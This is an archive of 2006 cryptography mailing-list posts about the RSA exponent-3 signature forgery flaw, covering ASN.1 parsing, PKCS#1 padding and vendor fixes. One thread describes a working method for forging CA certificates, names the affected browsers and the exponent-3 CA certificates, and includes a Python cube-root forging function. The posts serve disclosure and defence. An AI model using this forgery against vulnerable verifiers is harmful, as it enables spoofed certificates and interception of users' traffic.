Re: Exponent 3 damage spreads...

2006-09-15 Thread Peter Gutmann
Simon Josefsson [EMAIL PROTECTED] writes:

Deploying a hash widely isn't done easily, though.  GnuTLS only supports MD2,
MD5, SHA-1 and RIPEMD (of which MD2/MD5 are by default not used to verify
signatures).

Right, but it's been pure luck that that particular implementation (and most
likely a number of others) happen to have implemented only a small number of
hash algorithms that allow only absent or NULL parameters.  Anything out there
that implements a wider range of algorithms, including any that allow
parameters, is most likely toast.

What's more scary is that if anyone introduces a parameterised hash (it's
quite possible that this has already happened in some fields, and with the
current interest in randomised hashes it's only a matter of time before we see
these anyway), then changing a simple AlgoID definition in one part of the
code is going to suddenly break signatures 23 code modules away in a
different directory.  Will whoever's responsible for maintaining the hash
AlgoID table in some far-removed code module in several years' time know that
any change they make could cause a security breach via a non-obvious mechanism
in a far-distant piece of code?  This is just going to keep coming back and
biting us again and again unless we default to deny-all.

The e=3 issue is like the old war movies where someone steps on a mine and
hears the click, but isn't quite sure yet how long it'll be before they spread
themselves decoratively around the countryside.  We've heard the click, it's
time to get out of the minefield.

Peter.



Re: Exponent 3 damage spreads...

2006-09-15 Thread Bill Frantz
[EMAIL PROTECTED] (James A. Donald) on Thursday, September 14, 2006 wrote:

Obviously we do need a standard for describing structured data, and we 
need a standard that leads to that structured data being expressed 
concisely and compactly, but it seems to me that ASN.1 is causing a lot of 
grief.

What is wrong with it, what alternatives are there to it, or how can it 
be fixed?

In SPKI we used S-Expressions.  They have the advantage of being simple,
perhaps even too simple.

In describing interfaces in the KeyKOS design document
http://www.cis.upenn.edu/~KeyKOS/agorics/KeyKos/Gnosis/keywelcome.html
we used a notation similar to S-Expressions which was:

(length, data)

These could be combined into a structure: e.g. (4, len), (len, data) for
data preceded by a four byte length field.  If you standardize that the
data is always right justified in a field of length len, and that
binary data is encoded with a standard encoding (hexadecimal,
6-bit/character, decimal etc.), most of the problems I have seen
described in this thread should just go away.
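
As a rough illustration, a minimal encoder/decoder for this kind of
(length, data) field might look like the following.  This is a sketch only:
the four-byte big-endian length and the helper names are assumptions made
for the example, not anything taken from KeyKOS or SPKI.

    import struct

    def encode_field(data: bytes) -> bytes:
        # (4, len), (len, data): a four-byte length followed by exactly len bytes.
        return struct.pack(">I", len(data)) + data

    def decode_field(buf: bytes, offset: int = 0):
        # Read the fixed-size length, then exactly that many bytes; nothing
        # outside the declared length is ever interpreted as content.
        (length,) = struct.unpack_from(">I", buf, offset)
        start, end = offset + 4, offset + 4 + length
        if end > len(buf):
            raise ValueError("declared length runs past the end of the buffer")
        return buf[start:end], end

    # A structure is just a concatenation of such fields:
    msg = encode_field(b"sha-1") + encode_field(b"0123456789abcdef0123")
    algo, next_off = decode_field(msg)
    digest, _ = decode_field(msg, next_off)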

Some might object that having a specific number of bits for the length
field limits future expansion of this approach.  Indeed, ASN.1 avoids
this issue by allowing the encoding of arbitrary-length integers, and
XML does the same.  The cost of that flexibility is much more difficult
encoding and decoding.  If a length field of 4 to 8 bytes (32 to 64
bits) is chosen, then as a practical matter any length of data that is
transmittable in an exchange can be represented.  (A terabit/second is
10**12 bits/second.  A 64-bit length can count roughly a million seconds
of data at that rate; even a 32-bit length covers several gigabits,
which is ample for most individual fields.)
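
A quick sanity check on those numbers (plain arithmetic, nothing assumed
beyond the terabit/second figure above):

    rate = 10**12                 # bits per second (a terabit/second)
    print(2**32 / rate)           # ~0.004 s of data fits in a 32-bit bit count
    print(2**64 / rate)           # ~1.8e7 s (about 200 days) fits in 64 bits
    print(rate * 10**6 < 2**64)   # a million seconds at that rate still fits: True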

Cheers - Bill

---
Bill Frantz| gets() remains as a monument | Periwinkle 
(408)356-8506  | to C's continuing support of | 16345 Englewood Ave
www.pwpconsult.com | buffer overruns. | Los Gatos, CA 95032



Re: Why the exponent 3 error happened:

2006-09-15 Thread Peter Gutmann
Victor Duchovni [EMAIL PROTECTED] writes:

This, in my view, has little to do with ASN.1, XML, or other encoding
frameworks. Thorough input validation is not yet routinely and consistently
practiced by most software developers. Software is almost invariably written
to parse formats observed in practice correctly, and is then promptly
declared to work. 

It's not just this; sometimes the acceptance of not-quite-correct data is
necessary, because if you don't do it, your implementation breaks.  To take
one well-known example, Microsoft have consistently encoded the version info
in their SSL/TLS handshake wrong, which in theory allows rollback attacks.  So
as a developer you have the following options:

 1. Reject the encoding and be incompatible with 95(?)% of *all* deployed SSL
clients (that's *several hundred million* users).

 2. Turn a blind eye and interoperate with said several hundred million users,
at the expense of being vulnerable to rollback attacks.

I'm not aware of a single implementation that takes option 1, simply because
it would be pure marketplace suicide to do so.

The same goes for pretty much every other security protocol I know of.  SSH is
the most explicit: since clients and servers exchange ASCII strings before they
do anything else, all SSH implementations have a built-in database of known
bugs that they adjust their behaviour for when they detect a certain client or
server.  Obviously no-one will implement this bug-compatibility for a security
hole, but it's not impossible that some of this extended flexibility may at
some point lead to a problem.
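
In outline, such a bug-compatibility database amounts to nothing more than a
table of substring matches against the peer's identification string.  A
minimal sketch follows; the flag names and version strings are invented for
illustration and are not taken from any real SSH implementation.

    # Hypothetical bug-compatibility table keyed on the peer's version banner.
    KNOWN_QUIRKS = [
        ("OldVendor-1.",   {"broken_rekey"}),
        ("SomeServer_2.0", {"padding_off_by_one", "no_extensions"}),
    ]

    def quirks_for_banner(banner: str) -> set:
        """Return the set of workarounds to enable for this peer."""
        quirks = set()
        for pattern, flags in KNOWN_QUIRKS:
            if pattern in banner:
                quirks |= flags
        return quirks

    # e.g. quirks_for_banner("SSH-2.0-SomeServer_2.0p1")
    #      -> {"padding_off_by_one", "no_extensions"}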

For other protocols, it works in reverse: you recognise the peer implementation
by the bugs, not the other way round.  Beyond straight implementation bugs
though are standards that require insecure or ambiguous behaviour, either by
accident (which eventually gets fixed), or because of design-by-committee
politics, about which enough has probably been said in the past
(cough*IPsec*cough :-).

Peter.



Re: Why the exponent 3 error happened:

2006-09-15 Thread Steven M. Bellovin
On Thu, 14 Sep 2006 17:21:28 -0400, Victor Duchovni
[EMAIL PROTECTED] wrote:

 
 If so, I fear we are learning the wrong lesson, which while valid in
 other contexts is not pertinent here. TLS must be flexible enough to
 accommodate new algorithms, this means that the data structures being
 exchanged are malleable, and that implementations must validate strict
 adherence to a specifically defined form for the agreed algorithm,
 but the ability to express other forms cannot be designed out.
 
 This, in my view, has little to do with ASN.1, XML, or other encoding
 frameworks. Thorough input validation is not yet routinely and
 consistently practiced by most software developers. Software is almost
 invariably written to parse formats observed in practice correctly, and is
 then promptly declared to work. The skepticism necessary to continually
 question the implicit assumption that the input is well-formed is perhaps
 not compatible with being a well-socialized human. The attackers who ask
 the right questions to break systems and the few developers who write
 truly defensive code are definitely well off the middle of the bell-curve.
 
 It is not just PKCS#1 or X.509v3 that presents opportunities for crafting
 interesting messages. MIME, HTTP, HTML, XML, ... all exhibit similar
 pitfalls. Loosely speaking, this looks like a variant of Goedel's theorem,
 if the protocol is expressive enough it can express problematic assertions.
 
 We can fine-tune some protocols to remove stupid needless complexity, but
 enough complexity will remain to make the required implementation discipline
 beyond the reach of most software developers (at least as trained today,
 but it is not likely possible to design a training program that will
 produce a preponderance of strong defensive programmers).

A software testing expert once asked me why even good test groups didn't
find more of the software holes.  I told her it was because the spec said
things like "must accept input up to 4096 bytes" rather than "must accept
input up to 4096 bytes and must detect and reject longer input strings".
I think we're seeing the same thing here -- the spec didn't say "must
reject", so people who coded to the spec fell victim.

As for the "not compatible with a well-socialized human" -- well, maybe --
I don't think normal people describe themselves as "paranoid by
profession"...


--Steven M. Bellovin, http://www.cs.columbia.edu/~smb



Re: Why the exponent 3 error happened:

2006-09-15 Thread Richard Salz
From http://www.w3.org/2001/tag/doc/leastPower.html :

When designing computer systems, one is often faced with a choice between 
using a more or less powerful language for publishing information, for 
expressing constraints, or for solving some problem. This finding explores 
tradeoffs relating the choice of language to reusability of information. 
The Rule of Least Power suggests choosing the least powerful language 
suitable for a given purpose.

--
STSM, Senior Security Architect
SOA Appliances
Application Integration Middleware




RE: Real World Exploit for Bleichenbacher's Attack on SSL from Crypto'06 working

2006-09-15 Thread Erik Tews
On Thursday, 14.09.2006 at 22:23 -0700, Tolga Acar wrote:
 You need to have one zero octet after the bunch of FFs and before the
 DER-encoded hash blob in order to have a proper PKCS#1v1.5 signature encoding.
 
 Based on what you say below, "I used this cert and my key to sign an
 end-entity certificate which I used to set up a webserver", it appears that
 the implementations you used don't check for this one zero octet, either.

Yes, I have; I counted this as part of the ASN1DataWithHash.  I did not
check if it works without it.


signature.asc
Description: This is a digitally signed message part


RE: Real World Exploit for Bleichenbacher's Attack on SSL from Crypto'06 working

2006-09-15 Thread Tolga Acar
You need to have one zero octet after the bunch of FFs and before the
DER-encoded hash blob in order to have a proper PKCS#1v1.5 signature encoding.

Based on what you say below, "I used this cert and my key to sign an
end-entity certificate which I used to set up a webserver", it appears that
the implementations you used don't check for this one zero octet, either.

- Tolga 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Erik Tews
 Sent: Thursday, September 14, 2006 3:40 PM
 To: Cryptography
 Subject: Real World Exploit for Bleichenbacher's Attack on SSL 
 from Crypto'06 working
 
 Hi
 
 I had an idea very similar to the one Peter Gutmann had this
 morning. I managed to write a real world exploit which takes as input:

   * a CA certificate using 1024 Bit RSA and Exponent 3 (ca-in)
   * a Public Key, using an algorithm and size of your choice (key-in)

 and generates a CA certificate signed by ca-in, using public
 key key-in.
 
 At least 3 major web browsers on the market are shipped by
 default with CA certificates, which have signed other
 intermediate CAs which use rsa1024 with exponent 3, in their
 current version. With this exploit, you can now sign arbitrary
 server certificates for any website of your choice, which are
 accepted by all 3 web browsers without any kind of
 SSL warning message.
 
 I used the following method:

 I first generated a certificate, with BasicConstraints set to
 True, Public Key set to one of my keys, and Issuer set to the DN
 of a CA using 1024 Bit RSA with Exponent 3. I used usual values
 for all the other fields. When I signed the certificate I shifted
 all my data to the left. I had 46 bytes of fixed value (this can
 perhaps be reduced to 45 bytes, I have not checked yet, but
 even with 46, this attack works). They had the form 00 01 FF
 FF FF FF FF FF FF FF ASN1DataWithHash. This gives me 82 bytes
 I can fill with arbitrary values (at least, if the
 implementation skips some part of the ASN.1 data, I can
 choose some bytes there too).

 If you now set all the bytes to the right of your ASN1DataWithHash
 to 00, interpret that as a number n, and compute:

    y = (ceil(cubeRoot(n)))^3

 where ceil means rounding up to the next natural number and
 cubeRoot computes the cube root over the reals.
 
 y will be a perfect cube and have the form:
 
 00 01 FF FF FF FF FF FF FF FF ASN1DataWithHash' Garbage
 
 and ASN1DataWithHash' looks quite similar to your original 
 ASN1DataWithHash, with perhaps 2-3 rightmost bytes changed. 
 These bytes are part of the certificate hash value.
 
 This signature is useless, because every certificate has a
 fixed hash value. But you don't need to sign a fixed
 certificate. So I started adding some seconds to the notAfter
 value of the certificate and computed the hash again. I brute
 forced until I had a certificate where the computation of y
 did not alter any bytes of the ASN1DataWithHash.

 I had to try 275992 different values, which took 2-3 minutes
 on my 1.7 GHz Pentium using an unoptimized Java implementation.
 
 I used this cert and my key to sign an end-entity certificate
 which I used to set up a webserver.

 I have to check some legal aspects before publishing the
 names of the browsers which accepted this certificate and the
 names of the CA certificates with exponent 3 I used, in some
 hours, if nobody tells me not to do that. Depending on the
 advice I get, I will release the source code of the exploit too.
 
 Thanks go to Alexander May and Ralf-Philipp Weinmann who helped me.
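
In code, the cube-root step of the method quoted above comes down to
something like the sketch below.  This is a rough illustration under the
assumptions stated in the mail (a 1024-bit modulus, e=3, a prefix of 00 01
and eight FF bytes, and zero bytes to the right of the ASN1DataWithHash),
not Tews' actual implementation; the brute-force loop over notAfter is
omitted.

    def int_cube_root_ceil(n: int) -> int:
        # Integer cube root, rounded up (binary search, no floating point).
        lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
        while lo < hi:
            mid = (lo + hi) // 2
            if mid ** 3 < n:
                lo = mid + 1
            else:
                hi = mid
        return lo

    def forge_e3_signature(asn1_with_hash: bytes, modulus_bits: int = 1024):
        """Return bytes whose cube starts with 00 01 FF*8 || asn1_with_hash,
        or None if rounding up disturbed the prefix (then tweak the cert,
        e.g. its notAfter, and try again)."""
        prefix = b"\x00\x01" + b"\xff" * 8 + asn1_with_hash
        k = modulus_bits // 8
        n = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
        s = int_cube_root_ceil(n)
        cube = (s ** 3).to_bytes(k, "big")
        if cube[:len(prefix)] != prefix:
            return None
        return s.to_bytes(k, "big")

A verifier that checks only the prefix and the hash, and ignores whatever
follows, will accept the result as a valid signature; the 275992 attempts
mentioned above correspond to retrying with slightly different certificate
contents until the prefix check at the end passes.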
 




Re: RSA SecurID SID800 Token vulnerable by design

2006-09-15 Thread Daniel Carosone
On Thu, Sep 14, 2006 at 02:48:54PM -0400, Leichter, Jerry wrote:
 | The problem is that _because there is an interface to poll the token for
 | a code across the USB bus_, malicious software can *repeatedly* steal new
 | token codes *any time it wants to*.  This means that it can steal codes
 | when the user is not even attempting to authenticate

 I think this summarizes things nicely.

Me too.  While less emphatic, my reaction to Vin's post was similar to
Thor's.. that it seemed to at least miss, if not bury, this point.

But let's not also forget that these criticisms apply approximately
equally to smart card deployments with readers that lack a dedicated
pinpad and signing display.  For better or worse, people use those to
unlock the token with a pin entered on the host keyboard, and allow
any authentication by any application during a 'session', too.

 Pressing the button supplies exactly the confirmation of intent that
 was lost.

And further, a token that includes more buttons (specifically, a
pinpad for secure entry of the 'know' factor) is vulnerable to fewer
attacks, and one that permits a challenge-response factor for specific
transaction approval is vulnerable to fewer again (both at a cost).
Several vendors have useful offerings of these types.

The worst cost for these more advanced methods may be in user
acceptance: having to type one or more things into the token, and then
the response into the computer.  A USB connected token could improve
on this by transporting the challenge and response, displaying the
challenge while leaving the pinpad for authentication and approval.

But the best attribute of tokens is they neither use nor need *any*
interface other than a user interface. Therefore:

 * it works anywhere with any client device, like my phone. I choose
   my token model and balance user overhead according to my needs.

 * it is simple to analyse.  How would you ensure the above ideal
   hypothetical USB token really couldn't be subverted over the bus?

By the time you've given up that benefit, and done all that analysis,
and dealt with platform issues, perhaps you might as well get the
proper pinpad smartcard it's starting to sound like, and get proper
signatures as well, rather than using a shared-key with the server.

--
Dan.


pgpotlLAwVOtZ.pgp
Description: PGP signature


Re: Real World Exploit for Bleichenbacher's Attack on SSL from Crypto'06 working

2006-09-15 Thread Hal Finney
Erik Tews writes:
 At least 3 major web browsers on the market are shipped by default with
 CA certificates, which have signed other intermediate CAs which use
 rsa1024 with exponent 3, in their current version. With this exploit,
 you can now sign arbitrary server certificates for any website of your
 choice, which are accepted by all 3 web browsers without any kind of
 SSL warning message.

Is that true, did you try all 3 web browsers to see that they don't give
a warning message?  It's not enough that they accept a CA with exponent
3, they also have to have the flaw in verification that lets the bogus
signature through.

If it is true, if three different widely used webbrowsers are all
vulnerable to this attack, it suggests a possible problem due to the
establishment of a cryptographic monoculture.  If it turns out that
the same cryptographic library is used in all three of these browsers,
and that library has the flaw, then this reliance on a single source
for cryptographic technology could be a mistake.

Now in practice I don't think that Internet Explorer and Mozilla/Firefox
use the same crypto libraries, so either these are not two of the three,
or else they have independently made the same error.  It would be nice
to know which it is.

Hal Finney



A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread Peter Gutmann
When I fired up Firefox a few minutes ago it told me that there was a new
update available to fix security problems.  I thought, "Hmm, I wonder what
that would be...".  It's interesting to note that we now have fixes for many
of the OSS crypto apps (OpenSSL, gpg, Firefox (via NSS, so probably
Thunderbird as well), my own cryptlib), but nothing from any of the commercial
vendors.  Maybe someone should convert this into a DRM attack so Microsoft
will fix it before 2007 :-).

(The real #*($#*( for me is that I wanted to turn off e=3 years ago, but when
I did it in a snapshot release some squawk piped up to say that they were
using e=3 and the standard said it was OK and I was being non-standards
compliant and so on and so forth, so in the end I had to leave it enabled.  I
did make it very easy to turn off with a single-character code change, but
that may explain why commercial vendors are going to be reluctant to rush out
a fix without a lot of prior impact assessment).

Peter.



Re: Exponent 3 damage spreads...

2006-09-15 Thread Jostein Tveit
[EMAIL PROTECTED] (Peter Gutmann) writes:

 What's more scary is that if anyone introduces a parameterised hash (it's
 quite possible that this has already happened in some fields, and with the
 current interest in randomised hashes it's only a matter of time before we see
 these anyway) [...]

Both Rivest and Shamir said that they want a parameterised hash,
according to Paul Hoffman's "Notes from the Hash Futures Panel":
<URL: http://www.proper.com/lookit/hash-futures-panel-notes.html>

Maybe that's not so good after all.
Or maybe the not-so-good thing here is an exponent equal to 3...

-- 
Jostein Tveit [EMAIL PROTECTED]



Re: Why the exponent 3 error happened:

2006-09-15 Thread James A. Donald

--
Victor Duchovni wrote:
 If so, I fear we are learning the wrong lesson, which
 while valid in other contexts is not pertinent here.
 TLS must be flexible enough to accommodate new
 algorithms, this means that the data structures being
 exchanged are malleable, and that implementations must
 validate strict adherence to a specifically defined
 form for the agreed algorithm, but the ability to
 express other forms cannot be designed out.

There is no need, ever, for the RSA signature to encrypt
anything other than a hash, nor will there ever be such
a need.  In this case the use of ASN.1 serves absolutely
no purpose whatsoever, other than to create complexity,
bugs, and opportunities for attack.  It is sheer
pointless stupidity, complexity for the sake of
complexity, an indication that the standards process is
broken.

--digsig
 James A. Donald
 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
 mKNEZf/r5lZqyGpNhzkQ0zdt2uAdaxkSyyyxAW3W
 4BWO8prrBiE/VfMik8xpeS4TgD+5KsqGSGeRw2Dxr



Re: Exponent 3 damage spreads...

2006-09-15 Thread Peter Gutmann
Simon Josefsson [EMAIL PROTECTED] writes:

Test vectors for this second problem are as below, created by Yutaka OIWA.

To make this easier to work with, I've combined them into a PKCS #7 cert chain
(attached).  Just load/click on the chain and see what your app says.

(As an aside, this chain is invalid for an entirely unrelated reason, so no
standards-compliant PKI application should validate this chain even if the
signature did check out.  I wonder how many current apps will detect this?
See, you don't even need PKCS #1 padding tricks to fool a PKI app... :-).

Peter.

[2. application/octet-stream; bad_chain.der]...



Re: Why the exponent 3 error happened:

2006-09-15 Thread Peter Gutmann
Steven M. Bellovin [EMAIL PROTECTED] writes:

As for the "not compatible with a well-socialized human" -- well, maybe -- I
don't think normal people describe themselves as "paranoid by profession"...

Might I refer the reader to http://www.cs.auckland.ac.nz/~pgut001/.  I've even
received mail from address-harvesting bots that begin "Dear Paranoid, ..."

Peter.



Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread David Shaw
On Fri, Sep 15, 2006 at 08:49:31PM +1200, Peter Gutmann wrote:

 When I fired up Firefox a few minutes ago it told me that there was
 a new update available to fix security problems.  I thought, Hmm, I
 wonder what that would be  It's interesting to note that we now
 have fixes for many of the OSS crypto apps (OpenSSL, gpg, Firefox

GPG was not vulnerable, so no fix was issued.  Incidentally, GPG does
not attempt to parse the PKCS/ASN.1 data at all.  Instead, it
generates a new structure during signature verification and compares
it to the original.

David



Re: Why the exponent 3 error happened:

2006-09-15 Thread Hal Finney
James Donald writes:
 There is no need, ever, for the RSA signature to encrypt
 anything other than a hash, nor will there ever be such
 a need.  In this case the use of ASN.1 serves absolutely
 no purpose whatsoever, other than to create complexity,
 bugs, and opportunities for attack.  It is sheer
 pointless stupidity, complexity for the sake of
 complexity, an indication that the standards process is
 broken.

Actually there is something besides the hash there: an identifier for
which hash algorithm is used.  The ASN.1 OID was, I suppose, a handy and
already-existing mechanism for universal algorithm identification numbers.

Putting the hash identifier into the RSA signed data prevents hash
substitution attacks.  Otherwise the hash identifier has to be passed
unsigned, and an attacker could substitute a weak hash algorithm and find
a second preimage that matches your signed hash.  Maybe that is not part
of a threat model you are interested in but at least some signers don't
want their hash algorithms to be changed.

BTW I want to mention a correction to Peter Gutmann's post: as I
understand it, GnuPG was not vulnerable to this attack.  Neither was PGP.
The OpenPGP standard passes the hash number outside the RSA signed data
in addition to using PKCS-1 padding.  This simplifies the parsing as it
allows hard-coding the ASN.1 prefix as an opaque bit string, then doing
a simple comparison between the prefix+hash and what it should be.
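
A minimal sketch of that compare-rather-than-parse style of verification
(a raw RSA verify via modular exponentiation is assumed for brevity; the
15-byte SHA-1 DigestInfo prefix is the standard constant given in PKCS #1
and RFC 2440):

    import hashlib

    # DER prefix of a SHA-1 DigestInfo, treated as an opaque constant.
    SHA1_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")

    def verify_pkcs1_sha1(signature: bytes, message: bytes, n: int, e: int) -> bool:
        k = (n.bit_length() + 7) // 8
        em = pow(int.from_bytes(signature, "big"), e, n).to_bytes(k, "big")
        # Rebuild the one and only encoding we are willing to accept...
        digest = hashlib.sha1(message).digest()
        expected = (b"\x00\x01"
                    + b"\xff" * (k - 3 - len(SHA1_PREFIX) - len(digest))
                    + b"\x00" + SHA1_PREFIX + digest)
        # ...and compare the whole block, so trailing garbage, short padding
        # or unexpected parameters cannot slip through.
        return em == expected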

Hal Finney



Re: Why the exponent 3 error happened:

2006-09-15 Thread Ben Laurie
James A. Donald wrote:
 --
 Greg Rose wrote:
 At 19:02  +1000 2006/09/14, James A. Donald wrote:
 Suppose the padding was simply

 010101010101010 ... 1010101010101 hash

 with all leading zeros in the hash omitted, and four
 zero bits showing where the actual hash begins.

 Then the error would never have been possible.
 
 James A. Donald:
 I beg to differ. A programmer who didn't understand
 the significance of crypto primitives would (as many
 did) just search for the end of the padding to locate
 the beginning of the hash, and check that the next set
 of bytes were identical to the hash, then return
 true. So
 
 The hash is known size, and occurs in known position.
 He does not search the padding for location, but
 examines it for correct format.
 

 01010101 ... 1010101010101 hash crappetycrap

 would still be considered valid. There's a lot of code
 out there that ignored the fact that after the FFs was
 specific ASN.1 stuff, and just treated it as a defined
 part of the padding.
 
 And that code is correct, and does not have the problem
 that we discuss.  Paying attention to ASN.1 stuff is
 what is causing this problem.

No, it is incorrect and does have the problem we discuss. The fact that
it ignores the crap that's after the hash makes it vulnerable.

 Code is going wrong because ASN.1 can contain
 complicated malicious information to cause code to go
 wrong.  If we do not have that information, or simply
 ignore it, no problem.

This is incorrect. The simple form of the attack is exactly as described
above - implementations ignore extraneous data after the hash. This
extraneous data is _not_ part of the ASN.1 data.

The more complex form of the attack does actually use the ASN.1, in the
form of the parameters field. However, I'm not sure why you'd single out
ASN.1 as the cause of this problem: once the designers of the protocol
decided you needed parameters, the door was opened to the attack.
Implementations can incorrectly ignore the extraneous parameters no
matter how you encode them.

Not that I'm a fan of ASN.1, but if we're going to blame it for
problems, we should do so only when it is actually to blame.

The fault in this case is a combination of overly flexible protocol
design and implementation flaws.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html   http://www.links.org/

There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit. - Robert Woodruff



Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread Peter Gutmann
David Shaw [EMAIL PROTECTED] writes:

Incidentally, GPG does not attempt to parse the PKCS/ASN.1 data at all.
Instead, it generates a new structure during signature verification and
compares it to the original.

How does it handle the NULL vs. optional parameters ambiguity?

Peter.



Re: Real World Exploit for Bleichenbacher's Attack on SSL from Crypto'06 working

2006-09-15 Thread Erik Tews
Am Freitag, den 15.09.2006, 00:40 +0200 schrieb Erik Tews:
 I have to check some legal aspects before publishing the names of the
 browsers which accepted this certificate and the names of the
 CA certificates with exponent 3 I used, in some hours, if nobody tells me
 not to do that. Depending on the advice I get, I will release the
 source code of the exploit too.

OK, so here are the names of the browsers I tried:

  * Mozilla Firefox Version 1.5.0.6 and all previous versions,
    including old versions like Netscape 4, seem to be affected.
    They don't display any kind of warning message at all, nor can
    the user see anything by looking at the SSL connection
    properties. Firefox 1.5.0.7 was released yesterday and contains
    a fix. Netscape is no longer supported, and Netscape phoned me
    and suggested switching to another browser like Seamonkey.
  * Opera 9.01 is affected. Opera is going to release 9.02 very very
    soon, which will contain a bugfix. Opera users are automatically
    notified once a week when a new version is available.
  * Konqueror from the KDE project uses OpenSSL for SSL connections.
    It is affected, but after patching OpenSSL, Konqueror is fixed
    too.

The following certs could be used in the attack:

Starfieldtech has issued the following certificate:

Issuer: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2
Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
Subject: C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc.,
OU=http://www.starfieldtech.com/repository, CN=Starfield Secure Certification
Authority/[EMAIL PROTECTED]
X509v3 Basic Constraints: CA:TRUE
Serial Number: 260 (0x104)
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)

This can be used to create a CA certificate which seems to be signed by
Starfieldtech.

There is another certificate by default in a lot of browsers:

Issuer: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits 
liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server 
Certification Authority
Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits 
liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server 
Certification Authority
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)
X509v3 Basic Constraints: CA:TRUE
Serial Number: 927650371 (0x374ad243)

This one can be used too.

Depending on the browser you use, there are some other certificates.
Here is a list of the Subject DNs of all CA certs we have found so far
which seem to be affected:

  * C=US, O=Digital Signature Trust Co., OU=DSTCA E1
  * C=US, O=Digital Signature Trust Co., OU=DSTCA E2
  * C=US, O=Entrust.net, OU=www.entrust.net/Client_CA_Info/CPS
    incorp. by ref. limits liab., OU=(c) 1999 Entrust.net Limited,
    CN=Entrust.net Client Certification Authority
  * C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref.
    (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net
    Secure Server Certification Authority
  * C=EU, O=AC Camerfirma SA CIF A82743287,
    OU=http://www.chambersign.org, CN=Chambers of Commerce Root
  * C=EU, O=AC Camerfirma SA CIF A82743287,
    OU=http://www.chambersign.org, CN=Global Chambersign Root
  * C=US, O=The Go Daddy Group, Inc., OU=Go Daddy Class 2
    Certification Authority
  * C=US, O=Starfield Technologies, Inc., OU=Starfield Class 2
    Certification Authority

I decided to keep the actual implementation of the exploit secret for the 
moment.

We put up a little webpage summarizing some postings related to the
attack. This is written primarily for end users who want to secure their
browsers, but it contains links to some interesting mailing list posts too.

http://www.cdc.informatik.tu-darmstadt.de/securebrowser/


signature.asc
Description: This is a digitally signed message part


Re: A note on vendor reaction speed to the e=3 problem

2006-09-15 Thread David Shaw
On Sat, Sep 16, 2006 at 05:35:27AM +1200, Peter Gutmann wrote:
 David Shaw [EMAIL PROTECTED] writes:
 
 Incidentally, GPG does not attempt to parse the PKCS/ASN.1 data at all.
 Instead, it generates a new structure during signature verification and
 compares it to the original.
 
 How does it handle the NULL vs. optional parameters ambiguity?

GPG generates a new structure for each comparison, so just doesn't
include any extra parameters on it.  Any optional parameters on a
signature would cause that signature to fail validation.

RFC-2440 actually gives the exact bytes to use for the ASN.1 stuff,
which nicely cuts down on ambiguity.

David



RE: Why the exponent 3 error happened:

2006-09-15 Thread Whyte, William
   If so, I fear we are learning the wrong lesson, which
   while valid in other contexts is not pertinent here.
   TLS must be flexible enough to accommodate new
   algorithms, this means that the data structures being
   exchanged are malleable, and that implementations must
   validate strict adherence to a specifically defined
   form for the agreed algorithm, but the ability to
   express other forms cannot be designed out.
 
 There is no need, ever, for the RSA signature to encrypt
 anything other than a hash, nor will there ever be such
 a need.  In this case the use of ASN.1 serves absolutely
 no purpose whatsoever, other than to create complexity,
 bugs, and opportunities for attack.  It is sheer
 pointless stupidity, complexity for the sake of
 complexity, an indication that the standards process is
 broken.

I think this is a bit unfair.

PKCS#1 signatures were originally designed to include a hash 
identifier to address a specific concern, arising from the
fact that RSA signers can freely choose the hash algorithm
to use.

Say that Alice uses SHA-1 to generate her signature on m,
and SHA-1(m) = h.

Then the concern is that Bob can find a broken hash function
BASH such that BASH(m') = h. If he can do that and format a
message that claims to be signed with RSA and BASH, then he
can present Alice's signature as a valid signature on m'.

There are a number of different protections against this.
For example, Alice's cert could identify her key as only 
to be used with SHA-1 (this is effectively what happens with
DSA public keys). However, the convention has been to mark an
RSA key in an X.509 cert as rsaEncryption and not specify
in the AlgorithmIdentifier that it's only to be used with a
certain hash function (or signature scheme).

So PKCS#1 incorporated the hash identifier, which prevents
a signature generated with one hash algorithm from being
used with a different hash algorithm. (Since then, Burt
Kaliski's done some research on the use of hash firewalls
of this type: see
http://www.rsasecurity.com/rsalabs/node.asp?id=2020.
His conclusion is that by and large they aren't necessary,
but that isn't relevant to the discussion here).

At the time, ASN.1 was in widespread use, so it was an 
obvious decision (rather than pointless stupidity) to use 
it to encode the hash function identifier. In practice, 
the ASN.1 doesn't introduce complexity because most implementations 
(certainly ones I've worked on) simply treated it as a memcmp 
rather than wheeling out the heavy ASN.1 machinery.

The real problem isn't ASN.1; the problem is that an
encoding method was used for the rest of the signature
that didn't specify the length of the signature block
and it didn't occur to anyone to check it.

Cheers,

William

